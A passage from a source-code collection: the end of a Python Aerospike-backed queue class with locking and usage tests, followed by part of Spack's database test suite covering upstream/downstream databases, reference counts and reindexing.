If it fails for some reason, enqueue operations will fail due to fencing error until the fencing marker is
reset.
"""
write_policy = { 'exists': aerospike.POLICY_EXISTS_UPDATE }
try:
for i in range(self.num_buf_recs):
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(i))
self.client. put(buf_key, {'fencing_mark': 0}, write_policy)
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
self.client.put(metadata_key, {'fencing-ctr': 0}, write_policy)
except ex:
print('LargeQueue: critical error. Failure during reset of fencing marks', ex)
raise ex
return
def create_new_queue(self, client, namespace, q_name, max_size, slots_per_rec):
"""
Create a new queue using the input parameters.
:param client: client object returned by aerospike.connect()
:param namespace: namespace in which the queue records are to be stored
:param q_name: name of the queue, used as the "set" name
:param max_size: maximum number of entries to be held in the queue
:param slots_per_rec: number of entries per record, depending on the size of entry. must be carefully
selected otherwise record overflow can result at runtime.
"""
self.client = client
self.namespace = namespace
self.name = q_name
self.slots_per_rec = slots_per_rec
self.num_buf_recs = (max_size + self.slots_per_rec - 1) / self.slots_per_rec
self._create_metadata_record()
self._create_buf_records()
self.initialized = True
return
def initialize_existing_queue(self, client, namespace, q_name):
"""
Initialize an existing queue in the given namespace with the given name.
:param client: client object returned by aerospike.connect().
:param namespace: namespace in which the queue is stored
:param q_name: name of the queue
"""
metadata = LargeQueue._get_metadata(client, namespace, q_name)
if metadata is None:
raise ASAborted('Queue does not exist')
self.client = client
self.namespace = namespace
self.name = q_name
self.slots_per_rec = metadata['slots-per-rec']
self.num_buf_recs = metadata['num-buf-recs']
self.initialized = True
return
def _lock(self, txn_id, op):
"""
Atomically check if the queue is locked, break an expired lock, lock the queue and
set the lock-owner and lock-time, and if the operation is enqueue, also increment and
return the fencing counter.
Try multiple times if the lock is not available, and wait before subsequent attempt.
:param txn_id: lock owner id, must be unique among concurrent requests
:param op: enqueue or dequeue
:return: dict with head and tail positions on success
throws ASAborted('Failed to acquire lock') on failure
"""
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
for _ in range(LargeQueue.LOCK_MAX_RETRIES):
curr_time_ms = LargeQueue._curr_time_milliseconds()
predexps = [ predexp.integer_bin("locked"),
predexp.integer_value(0),
predexp.integer_equal(),
predexp.integer_bin("lock-time-ms"),
predexp.integer_value(curr_time_ms-LargeQueue.LOCK_EXPIRATION_MS),
predexp.integer_less(),
predexp.predexp_or(2) ]
ops = [ op_helpers.read('head-offset'),
op_helpers.read('tail-offset'),
op_helpers.write('locked', 1),
op_helpers.write('lock-owner', txn_id),
op_helpers.write('lock-time-ms', curr_time_ms) ]
if op == LargeQueue.Ops.Enqueue:
ops.append(op_helpers.increment('fencing-ctr', 1))
ops.append(op_helpers.read('fencing-ctr'))
try:
_, _, record = self.client.operate(metadata_key, ops, policy={'predexp': predexps})
except exception.FilteredOut as ex: # predexp failed
time.sleep(LargeQueue.LOCK_POLL_WAIT_MS/1000.0)
continue
return record
raise ASAborted('Failed to acquire lock')
def _commit_release(self, txn_id, new_head_offset=None, new_tail_offset=None):
"""
If the lock is still held by this requester (txn-id), update the new positions of head/tail and r
elease the lock. Otherwise abort the request as timed out.
:param txn_id: lock owner id, must be unique among concurrent requests
:param new_head_offset: new head offset to be updated
:param new_tail_offset: new tail offset to be updated
:return: throws ASAborted('Timed out')
"""
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
predexps = [ predexp.integer_bin("locked"),
predexp.integer_value(1),
predexp.integer_equal(),
predexp.integer_bin("lock-owner"),
predexp.integer_value(txn_id),
predexp.integer_equal(),
predexp.predexp_and(2)]
ops = [ op_helpers.write('locked', 0),
op_helpers.write('lock-owner', None),
op_helpers.write('lock-time-ms', None) ]
if new_head_offset is not None:
ops.append(op_helpers.write('head-offset', new_head_offset))
if new_tail_offset is not None:
ops.append(op_helpers.write('tail-offset', new_tail_offset))
try:
_ = self.client.operate(metadata_key, ops, policy={'predexp': predexps})
except exception.FilteredOut as ex: # predexp failed
raise ASAborted('Timed out')
return
def _get_entry_location(self, entry_offset):
"""
Get the record index and entry index within the record, given the entry's offset.
:param entry_offset: offset of the entry
:return: tuple (record index, entry index)
"""
buf_rec_index = int(entry_offset / self.slots_per_rec) % self.num_buf_recs
entry_index = entry_offset % self.slots_per_rec
return buf_rec_index, entry_index
def _queue_is_full(self, head_offset, tail_offset):
"""
Check if the queue is full.
:param head_offset: Offset of the head entry.
:param tail_offset: Offset of the tail entry (next added entry).
:return: True if full, False otherwise
"""
num_entries = tail_offset - head_offset
return num_entries == self.num_buf_recs * self.slots_per_rec
def _queue_is_empty(self, head_offset, tail_offset):
"""
Check if the queue is empty.
:param head_offset: Offset of the head entry.
:param tail_offset: Offset of the tail entry (next added entry).
:return: True if empty, False otherwise
"""
return 0 == tail_offset - head_offset
def enqueue(self, entry, txn_id, overwrite_if_full=False):
"""
Append a new entry to the queue. Fails if the queue lock cannot be acquired. Can fail if the queue is full.
If the fencing counter has wrapped around, reset all fencing values.
:param entry: new entry to be enqueued
:param txn_id: lock owner id, must be unique among concurrent requests
:param overwrite_if_full: flag indicating if the head position should be overwritten if the queue is full
:return: Offset position of the enqueued entry. throws: ASAborted('Queue is full'), ASAborted('Timed out')
"""
q_state = self._lock(txn_id, LargeQueue.Ops.Enqueue)
# compute the record and list indices
head_offset = long(q_state['head-offset'])
tail_offset = long(q_state['tail-offset'])
fencing_ctr = q_state['fencing-ctr']
# if the fencing counter has a non-positive value, it has wrapped around past the max value; reset
if fencing_ctr <= 0:
self._reset_fencing_marks()
buf_rec_index, entry_index = self._get_entry_location(tail_offset) # tail points to where the new entry will go
entry_val = {'offset': tail_offset, 'entry': entry}
queue_is_full = self._queue_is_full(head_offset, tail_offset)
if queue_is_full and not overwrite_if_full:
self._commit_release(txn_id)
raise ASAborted('Queue is full')
predexps = [ predexp.integer_bin("fencing-mark"),
predexp.integer_value(fencing_ctr),
predexp.integer_less() ]
ops = [ op_helpers.write('fencing-mark', fencing_ctr),
list_helpers.list_set('entries', entry_index, entry_val) ]
buf_rec_key = (self.namespace, self.name, LargeQueue._buf_record_key(buf_rec_index))
try:
(_, _, record) = self.client.operate(buf_rec_key, ops, policy={'predexp': predexps})
except exception.FilteredOut as ex:
raise ASAborted('Timed out')
self._commit_release(txn_id, new_head_offset=head_offset + 1 if queue_is_full else None,
new_tail_offset=tail_offset + 1)
return tail_offset
def dequeue(self, txn_id):
"""
Dequee and return the entry at the head of the queue. If the queue is empty, returns None.
:param txn_id: lock owner id, must be unique among concurrent requests
:return: dict containing entry and offset for the entry at the head of the queue,
or None if the queue is empty
"""
q_state = self._lock(txn_id, LargeQueue.Ops.Dequeue)
# compute the record and list indices
head_offset = long(q_state['head-offset'])
tail_offset = long(q_state['tail-offset'])
if self._queue_is_empty(head_offset, tail_offset):
self._commit_release(txn_id)
return None
buf_rec_index, entry_index = self._get_entry_location(head_offset)
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(buf_rec_index))
ops = [ list_helpers.list_get('entries', entry_index) ]
(_, _, record) = self.client.operate(buf_key, ops)
self._commit_release(txn_id, new_head_offset=head_offset+1)
return record['entries']
def get_entry_at_offset(self, offset):
'''
Get the entry at the given offset if the offset currently exists in the queue. The function
does not acquire the queue lock and offers no guarantee that an entry exists or has not been removed
at that offset.
:param offset: offset of the entry (offset is the monotonically increasing position in the queue)
:return: dict containing entry and offset if the entry at the offset is present in the queue, otherwise None
'''
# get head and tail offsets
metadata_key = (self.namespace, self.name, LargeQueue.META_REC_KEY)
metadata_bins = ['head-offset', 'tail-offset']
(_, _, q_state) = self.client.select(metadata_key, metadata_bins)
head_offset = long(q_state['head-offset'])
tail_offset = long(q_state['tail-offset'])
if (offset >= tail_offset) or (offset < head_offset):
return None
buf_rec_index, entry_index = self._get_entry_location(offset)
buf_key = (self.namespace, self.name, LargeQueue._buf_record_key(buf_rec_index))
entry = self.client.list_get(buf_key, 'entries', entry_index)
if entry['offset'] != offset:
return None
return entry
# Usage and test examples
def main():
'''
Simple usage examples and tests.
'''
config = {
'hosts': [('172.28.128.4', 3000)],
'policies': {'timeout': 1200}
}
QUEUE_MAX_SIZE = 1000
ENTRIES_PER_REC = 100
client = aerospike.client(config).connect()
# Create a new queue or initialize an existing queue
msg_queue = LargeQueue()
try:
msg_queue.initialize_existing_queue(client, 'test', 'shared-msg-bus')
except ASAborted as ex:
msg_queue.create_new_queue(client, 'test', 'shared-msg-bus', QUEUE_MAX_SIZE, ENTRIES_PER_REC)
# Add entries
# add two messages
# note txn-id is used as lock owner id, and needs only to be unique across all active clients
# so we can use the same txn_id in the following operations
txn_id = 1
msg = {'msg-id': 100, 'msg-text': 'The school is closed for summer.'}
try:
offset = msg_queue.enqueue(msg, txn_id)
print('message 100 added at offset {}'.format(offset))
except ASAborted as ex:
print('enqueue failed, reason: {}'.format(ex.reason))
msg = {'msg-id': 101, 'msg-text': 'Have a nice summer!'}
try:
offset = msg_queue.enqueue(msg, txn_id)
print('message 101 added at offset {}'.format(offset))
except ASAborted as ex:
print('enqueue failed, reason: {}'.format(ex.reason))
# Get queue status
q_info = msg_queue.get_queue_info()
print('queue status: {}'.format(q_info))
# Read entry at offset
offset = q_info['head-offset'] + 1
msg_entry = msg_queue.get_entry_at_offset(offset)
print('entry at offset {}: {}'.format(offset, msg_entry))
# Pop the head entry
try:
msg_entry = msg_queue.dequeue(txn_id)
print('dequeued entry: {}'.format(msg_entry))
except ASAborted as ex:
print('dequeue failed, reason: {}'.format(ex.reason))
# end status of the queue
q_info = msg_queue.get_queue_info()
print('end status: {}'.format(q_info))
# TESTS
# create a queue with max size 10 with 3 entries per record
client = aerospike.client(config).connect()
test_queue = LargeQueue()
try:
test_queue.initialize_existing_queue(client, 'test', 'test_queue')
except ASAborted as ex:
test_queue.create_new_queue(client, 'test', 'test_queue', 10, 3)
# dequeue - empty queue
txn_id = 111
try:
entry = test_queue.dequeue(txn_id)
print('found: {}'.format(entry))
except ASAborted as ex:
print('dequeue failed, reason: {}'.format(ex.reason))
# enqueue/dequeue
entry = 999
try:
offset = test_queue.enqueue(msg, txn_id)
print('added: {} at offset: {}'.format(entry, offset))
except ASAborted as ex:
print('enqueue failed, reason: {}'.format(ex.reason))
try:
out = test_queue.dequeue(txn_id)
print('dequeued: {}'.format(out))
except ASAborted as ex:
print('dequeue failed, reason: {}'.format(ex.reason))
# add 20 items
print('adding without overwrite')
for i in range(20):
try:
offset = test_queue.enqueue(i, txn_id)
print('added entry {} at offset {}'.format(i, offset))
except ASAborted as ex:
print('aborted: entry {}, reason: {}'.format(i, ex.reason))
print('adding with overwrite')
for i in (range(20)):
try:
offset = test_queue.enqueue(i, txn_id, True)
print('added entry {} at offset {}'.format(i, offset))
except ASAborted as ex:
print('aborted: entry {}, reason: {}'.format(i, ex.reason))
print('get info')
info = test_queue.get_queue_info()
print('info: {}'.format(info))
print('get entries at offset')
for i in range(info['head-offset'], info['tail-offset']):
entry = test_queue.get_entry_at_offset(i)
print('at offset {} got entry {}'.format(i, entry))
print('dequeue all entries')
while True:
try:
entry = test_queue.dequeue(txn_id)
print('dequeued entry: {}'.format(entry))
if entry is None:
print('done')
break
except ASAborted as ex:
print('aborted: reason: {}'.format(ex.reason))
break
exit(0)
if __name__ == "__main__":
main()
| 45.884826
| 119
| 0.645882
|
8f0f4dff6abb029a5854c22d72b789f15654eaf6
| 28,798
|
py
|
Python
|
lib/spack/spack/test/database.py
|
fcannini/spack
|
9b3f5f3890025494ffa620d144d22a4734c8fcee
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null |
lib/spack/spack/test/database.py
|
fcannini/spack
|
9b3f5f3890025494ffa620d144d22a4734c8fcee
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2018-07-06T19:11:46.000Z
|
2018-07-06T19:12:28.000Z
|
lib/spack/spack/test/database.py
|
fcannini/spack
|
9b3f5f3890025494ffa620d144d22a4734c8fcee
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1
|
2020-03-06T11:04:37.000Z
|
2020-03-06T11:04:37.000Z
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check the database is functioning properly,
both in memory and in its file
"""
import datetime
import functools
import multiprocessing
import os
import pytest
import json
import llnl.util.lock as lk
from llnl.util.tty.colify import colify
import spack.repo
import spack.store
import spack.database
import spack.package
import spack.spec
from spack.test.conftest import MockPackage, MockPackageMultiRepo
from spack.util.executable import Executable
pytestmark = pytest.mark.db
@pytest.fixture()
def test_store(tmpdir):
real_store = spack.store.store
spack.store.store = spack.store.Store(str(tmpdir.join('test_store')))
yield
spack.store.store = real_store
@pytest.fixture()
def upstream_and_downstream_db(tmpdir_factory, gen_mock_layout):
mock_db_root = str(tmpdir_factory.mktemp('mock_db_root'))
upstream_write_db = spack.database.Database(mock_db_root)
upstream_db = spack.database.Database(mock_db_root, is_upstream=True)
# Generate initial DB file to avoid reindex
with open(upstream_write_db._index_path, 'w') as db_file:
upstream_write_db._write_to_file(db_file)
upstream_layout = gen_mock_layout('/a/')
downstream_db_root = str(
tmpdir_factory.mktemp('mock_downstream_db_root'))
downstream_db = spack.database.Database(
downstream_db_root, upstream_dbs=[upstream_db])
with open(downstream_db._index_path, 'w') as db_file:
downstream_db._write_to_file(db_file)
downstream_layout = gen_mock_layout('/b/')
yield upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout
@pytest.mark.usefixtures('config')
def test_installed_upstream(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
x = MockPackage('x', [], [])
z = MockPackage('z', [], [])
y = MockPackage('y', [z], [default])
w = MockPackage('w', [x, y], [default, default])
mock_repo = MockPackageMultiRepo([w, x, y, z])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('w')
spec.concretize()
for dep in spec.traverse(root=False):
upstream_write_db.add(dep, upstream_layout)
upstream_db._read()
for dep in spec.traverse(root=False):
record = downstream_db.get_by_hash(dep.dag_hash())
assert record is not None
with pytest.raises(spack.database.ForbiddenLockError):
record = upstream_db.get_by_hash(dep.dag_hash())
new_spec = spack.spec.Spec('w')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
for dep in new_spec.traverse(root=False):
upstream, record = downstream_db.query_by_spec_hash(
dep.dag_hash())
assert upstream
assert record.path == upstream_layout.path_for_spec(dep)
upstream, record = downstream_db.query_by_spec_hash(
new_spec.dag_hash())
assert not upstream
assert record.installed
upstream_db._check_ref_counts()
downstream_db._check_ref_counts()
@pytest.mark.usefixtures('config')
def test_removed_upstream_dep(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
z = MockPackage('z', [], [])
y = MockPackage('y', [z], [default])
mock_repo = MockPackageMultiRepo([y, z])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('y')
spec.concretize()
upstream_write_db.add(spec['z'], upstream_layout)
upstream_db._read()
new_spec = spack.spec.Spec('y')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
upstream_write_db.remove(new_spec['z'])
upstream_db._read()
new_downstream = spack.database.Database(
downstream_db.root, upstream_dbs=[upstream_db])
new_downstream._fail_when_missing_deps = True
with pytest.raises(spack.database.MissingDependenciesError):
new_downstream._read()
@pytest.mark.usefixtures('config')
def test_add_to_upstream_after_downstream(upstream_and_downstream_db):
"""An upstream DB can add a package after it is installed in the downstream
DB. When a package is recorded as installed in both, the results should
refer to the downstream DB.
"""
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
x = MockPackage('x', [], [])
mock_repo = MockPackageMultiRepo([x])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
downstream_db.add(spec, downstream_layout)
upstream_write_db.add(spec, upstream_layout)
upstream_db._read()
upstream, record = downstream_db.query_by_spec_hash(spec.dag_hash())
# Even though the package is recorded as installed in the upstream DB,
# we prefer the locally-installed instance
assert not upstream
qresults = downstream_db.query('x')
assert len(qresults) == 1
queried_spec, = qresults
try:
orig_db = spack.store.db
spack.store.db = downstream_db
assert queried_spec.prefix == downstream_layout.path_for_spec(spec)
finally:
spack.store.db = orig_db
@pytest.mark.usefixtures('config')
def test_cannot_write_upstream(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/']]
x = MockPackage('x', [], [])
mock_repo = MockPackageMultiRepo([x])
# Instantiate the database that will be used as the upstream DB and make
# sure it has an index file
upstream_db_independent = spack.database.Database(roots[1])
with upstream_db_independent.write_transaction():
pass
upstream_dbs = spack.store._construct_upstream_dbs_from_install_roots(
[roots[1]], _test=True)
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
with pytest.raises(spack.database.ForbiddenLockError):
upstream_dbs[0].add(spec, layouts[1])
@pytest.mark.usefixtures('config')
def test_recursive_upstream_dbs(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b', 'c']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/', '/rc/']]
default = ('build', 'link')
z = MockPackage('z', [], [])
y = MockPackage('y', [z], [default])
x = MockPackage('x', [y], [default])
mock_repo = MockPackageMultiRepo([x, y, z])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
db_c = spack.database.Database(roots[2])
db_c.add(spec['z'], layouts[2])
db_b = spack.database.Database(roots[1], upstream_dbs=[db_c])
db_b.add(spec['y'], layouts[1])
db_a = spack.database.Database(roots[0], upstream_dbs=[db_b, db_c])
db_a.add(spec['x'], layouts[0])
upstream_dbs_from_scratch = (
spack.store._construct_upstream_dbs_from_install_roots(
[roots[1], roots[2]], _test=True))
db_a_from_scratch = spack.database.Database(
roots[0], upstream_dbs=upstream_dbs_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec.dag_hash()) == (
db_a_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec['y'].dag_hash()) == (
upstream_dbs_from_scratch[0])
assert db_a_from_scratch.db_for_spec_hash(spec['z'].dag_hash()) == (
upstream_dbs_from_scratch[1])
db_a_from_scratch._check_ref_counts()
upstream_dbs_from_scratch[0]._check_ref_counts()
upstream_dbs_from_scratch[1]._check_ref_counts()
assert (db_a_from_scratch.installed_relatives(spec) ==
set(spec.traverse(root=False)))
assert (db_a_from_scratch.installed_relatives(
spec['z'], direction='parents') == set([spec, spec['y']]))
@pytest.fixture()
def usr_folder_exists(monkeypatch):
"""The ``/usr`` folder is assumed to be existing in some tests. This
fixture makes it such that its existence is mocked, so we have no
requirements on the system running tests.
"""
isdir = os.path.isdir
@functools.wraps(os.path.isdir)
def mock_isdir(path):
if path == '/usr':
return True
return isdir(path)
monkeypatch.setattr(os.path, 'isdir', mock_isdir)
def _print_ref_counts():
"""Print out all ref counts for the graph used here, for debugging"""
recs = []
def add_rec(spec):
cspecs = spack.store.db.query(spec, installed=any)
if not cspecs:
recs.append("[ %-7s ] %-20s-" % ('', spec))
else:
key = cspecs[0].dag_hash()
rec = spack.store.db.get_record(cspecs[0])
recs.append("[ %-7s ] %-20s%d" % (key[:7], spec, rec.ref_count))
with spack.store.db.read_transaction():
add_rec('mpileaks ^mpich')
add_rec('callpath ^mpich')
add_rec('mpich')
add_rec('mpileaks ^mpich2')
add_rec('callpath ^mpich2')
add_rec('mpich2')
add_rec('mpileaks ^zmpi')
add_rec('callpath ^zmpi')
add_rec('zmpi')
add_rec('fake')
add_rec('dyninst')
add_rec('libdwarf')
add_rec('libelf')
colify(recs, cols=3)
def _check_merkleiness():
"""Ensure the spack database is a valid merkle graph."""
all_specs = spack.store.db.query(installed=any)
seen = {}
for spec in all_specs:
for dep in spec.dependencies():
hash_key = dep.dag_hash()
if hash_key not in seen:
seen[hash_key] = id(dep)
else:
assert seen[hash_key] == id(dep)
def _check_db_sanity(database):
"""Utiilty function to check db against install layout."""
pkg_in_layout = sorted(spack.store.layout.all_specs())
actual = sorted(database.query())
externals = sorted([x for x in actual if x.external])
nexpected = len(pkg_in_layout) + len(externals)
assert nexpected == len(actual)
non_external_in_db = sorted([x for x in actual if not x.external])
for e, a in zip(pkg_in_layout, non_external_in_db):
assert e == a
_check_merkleiness()
def _check_remove_and_add_package(database, spec):
"""Remove a spec from the DB, then add it and make sure everything's
still ok once it is added. This checks that it was
removed, that it's back when added again, and that ref
counts are consistent.
"""
original = database.query()
database._check_ref_counts()
# Remove spec
concrete_spec = database.remove(spec)
database._check_ref_counts()
remaining = database.query()
# ensure spec we removed is gone
assert len(original) - 1 == len(remaining)
assert all(s in original for s in remaining)
assert concrete_spec not in remaining
# add it back and make sure everything is ok.
database.add(concrete_spec, spack.store.layout)
installed = database.query()
assert concrete_spec in installed
assert installed == original
# sanity check against direcory layout and check ref counts.
_check_db_sanity(database)
database._check_ref_counts()
def _mock_install(spec):
s = spack.spec.Spec(spec)
s.concretize()
pkg = spack.repo.get(s)
pkg.do_install(fake=True)
def _mock_remove(spec):
specs = spack.store.db.query(spec)
assert len(specs) == 1
spec = specs[0]
spec.package.do_uninstall(spec)
def test_default_queries(database):
# Testing a package whose name *doesn't* start with 'lib'
# to ensure the library has 'lib' prepended to the name
rec = database.get_record('zmpi')
spec = rec.spec
libraries = spec['zmpi'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'zmpi'
headers = spec['zmpi'].headers
assert len(headers) == 1
assert headers.names[0] == 'zmpi'
command = spec['zmpi'].command
assert isinstance(command, Executable)
assert command.name == 'zmpi'
assert os.path.exists(command.path)
# Testing a package whose name *does* start with 'lib'
# to ensure the library doesn't have a double 'lib' prefix
rec = database.get_record('libelf')
spec = rec.spec
libraries = spec['libelf'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'elf'
headers = spec['libelf'].headers
assert len(headers) == 1
assert headers.names[0] == 'libelf'
command = spec['libelf'].command
assert isinstance(command, Executable)
assert command.name == 'libelf'
assert os.path.exists(command.path)
def test_005_db_exists(database):
"""Make sure db cache file exists after creating."""
index_file = os.path.join(database.root, '.spack-db', 'index.json')
lock_file = os.path.join(database.root, '.spack-db', 'lock')
assert os.path.exists(str(index_file))
assert os.path.exists(str(lock_file))
def test_010_all_install_sanity(database):
"""Ensure that the install layout reflects what we think it does."""
all_specs = spack.store.layout.all_specs()
assert len(all_specs) == 14
# Query specs with multiple configurations
mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]
callpath_specs = [s for s in all_specs if s.satisfies('callpath')]
mpi_specs = [s for s in all_specs if s.satisfies('mpi')]
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# Query specs with single configurations
dyninst_specs = [s for s in all_specs if s.satisfies('dyninst')]
libdwarf_specs = [s for s in all_specs if s.satisfies('libdwarf')]
libelf_specs = [s for s in all_specs if s.satisfies('libelf')]
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich2')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^zmpi')]
) == 1
def test_015_write_and_read(mutable_database):
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_020_db_sanity(database):
"""Make sure query() returns what's actually in the db."""
_check_db_sanity(database)
def test_025_reindex(mutable_database):
"""Make sure reindex works and ref counts are valid."""
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_026_reindex_after_deprecate(mutable_database):
"""Make sure reindex works and ref counts are valid after deprecation."""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_030_db_sanity_from_another_process(mutable_database):
def read_and_modify():
# check that other process can read DB
_check_db_sanity(mutable_database)
with mutable_database.write_transaction():
_mock_remove('mpileaks ^zmpi')
p = multiprocessing.Process(target=read_and_modify, args=())
p.start()
p.join()
# ensure child process change is visible in parent process
with mutable_database.read_transaction():
assert len(mutable_database.query('mpileaks ^zmpi')) == 0
def test_040_ref_counts(database):
"""Ensure that we got ref counts right when we read the DB."""
database._check_ref_counts()
def test_041_ref_counts_deprecate(mutable_database):
"""Ensure that we have appropriate ref counts after deprecating"""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
mutable_database._check_ref_counts()
def test_050_basic_query(database):
"""Ensure querying database is consistent with what is installed."""
# query everything
assert len(spack.store.db.query()) == 16
# query specs with multiple configurations
mpileaks_specs = database.query('mpileaks')
callpath_specs = database.query('callpath')
mpi_specs = database.query('mpi')
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# query specs with single configurations
dyninst_specs = database.query('dyninst')
libdwarf_specs = database.query('libdwarf')
libelf_specs = database.query('libelf')
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(database.query('mpileaks ^mpich')) == 1
assert len(database.query('mpileaks ^mpich2')) == 1
assert len(database.query('mpileaks ^zmpi')) == 1
# Query by date
assert len(database.query(start_date=datetime.datetime.min)) == 16
assert len(database.query(start_date=datetime.datetime.max)) == 0
assert len(database.query(end_date=datetime.datetime.min)) == 0
assert len(database.query(end_date=datetime.datetime.max)) == 16
def test_060_remove_and_add_root_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'mpileaks ^mpich')
def test_070_remove_and_add_dependency_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'dyninst')
def test_080_root_ref_counts(mutable_database):
rec = mutable_database.get_record('mpileaks ^mpich')
# Remove a top-level spec from the DB
mutable_database.remove('mpileaks ^mpich')
# record no longer in DB
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
# record's deps have updated ref_counts
assert mutable_database.get_record('callpath ^mpich').ref_count == 0
assert mutable_database.get_record('mpich').ref_count == 1
# Put the spec back
mutable_database.add(rec.spec, spack.store.layout)
# record is present again
assert len(mutable_database.query('mpileaks ^mpich', installed=any)) == 1
# dependencies have ref counts updated
assert mutable_database.get_record('callpath ^mpich').ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
def test_090_non_root_ref_counts(mutable_database):
mutable_database.get_record('mpileaks ^mpich')
mutable_database.get_record('callpath ^mpich')
# "force remove" a non-root spec from the DB
mutable_database.remove('callpath ^mpich')
# record still in DB but marked uninstalled
assert mutable_database.query('callpath ^mpich', installed=True) == []
assert len(mutable_database.query('callpath ^mpich', installed=any)) == 1
# record and its deps have same ref_counts
assert mutable_database.get_record(
'callpath ^mpich', installed=any
).ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
# remove only dependent of uninstalled callpath record
mutable_database.remove('mpileaks ^mpich')
# record and parent are completely gone.
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
assert mutable_database.query('callpath ^mpich', installed=any) == []
# mpich ref count updated properly.
mpich_rec = mutable_database.get_record('mpich')
assert mpich_rec.ref_count == 0
def test_100_no_write_with_exception_on_remove(database):
def fail_while_writing():
with database.write_transaction():
_mock_remove('mpileaks ^zmpi')
raise Exception()
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure zmpi is still there.
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
def test_110_no_write_with_exception_on_install(database):
def fail_while_writing():
with database.write_transaction():
_mock_install('cmake')
raise Exception()
with database.read_transaction():
assert database.query('cmake', installed=any) == []
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure cmake was not written.
with database.read_transaction():
assert database.query('cmake', installed=any) == []
def test_115_reindex_with_packages_not_in_repo(mutable_database):
# Dont add any package definitions to this repository, the idea is that
# packages should not have to be defined in the repository once they
# are installed
with spack.repo.swap(MockPackageMultiRepo([])):
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_external_entries_in_db(mutable_database):
rec = mutable_database.get_record('mpileaks ^zmpi')
assert rec.spec.external_path is None
assert rec.spec.external_module is None
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is False
rec.spec.package.do_install(fake=True, explicit=True)
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is True
@pytest.mark.regression('8036')
def test_regression_issue_8036(mutable_database, usr_folder_exists):
# The test ensures that the external package prefix is treated as
# existing. Even when the package prefix exists, the package should
# not be considered installed until it is added to the database with
# do_install.
s = spack.spec.Spec('externaltool@0.9')
s.concretize()
assert not s.package.installed
# Now install the external package and check again the `installed` property
s.package.do_install(fake=True)
assert s.package.installed
@pytest.mark.regression('11118')
def test_old_external_entries_prefix(mutable_database):
with open(spack.store.db._index_path, 'r') as f:
db_obj = json.loads(f.read())
s = spack.spec.Spec('externaltool')
s.concretize()
db_obj['database']['installs'][s.dag_hash()]['path'] = 'None'
with open(spack.store.db._index_path, 'w') as f:
